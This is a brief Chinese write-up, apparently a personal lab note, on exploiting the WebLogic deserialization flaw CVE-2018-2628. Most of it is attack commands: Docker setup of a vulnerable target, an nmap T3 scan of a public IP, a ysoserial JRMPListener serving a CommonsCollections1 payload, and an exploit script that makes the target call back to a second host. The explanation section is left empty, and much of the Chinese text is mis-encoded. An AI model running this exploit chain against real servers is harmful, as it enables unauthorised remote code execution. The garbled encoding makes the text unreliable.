環(huán)境搭建
weblogic靶機(jī):
docker pull zhiqzhao/ubuntu_weblogic1036_domain
docker images
docker run -d -p7001:7001 zhiqzhao/ubuntu_weblogic1036_domain
攻擊的服務(wù)器:
java + python2環(huán)境即可
docker學(xué)習(xí)筆記: https://www.evernote.com/shard/s461/sh/bc38ea4c-3bfe-4321-ab3c-1742f69998e4/4e371b210ab3b23e9df415f54dadaabb
漏洞利用
在windows上執(zhí)行exploit,返回?cái)?shù)據(jù)二進(jìn)制會(huì)在cmd中報(bào)錯(cuò),但是命令是可以執(zhí)行成功的,Linux下是沒有報(bào)錯(cuò)的。
攻擊機(jī)執(zhí)行命令:
nmap -sV --script=weblogic-t3-info -Pn 120.77.253.216 -p7001
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/zhenxin'
python cve-2018-2628.py 120.77.253.216 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 122.152.233.180 1099 JRMPClient2
image.png
image.png
image.png
漏洞原理
明天補(bǔ)。
參考文章
https://blog.csdn.net/archersaber39/article/details/80135463#t0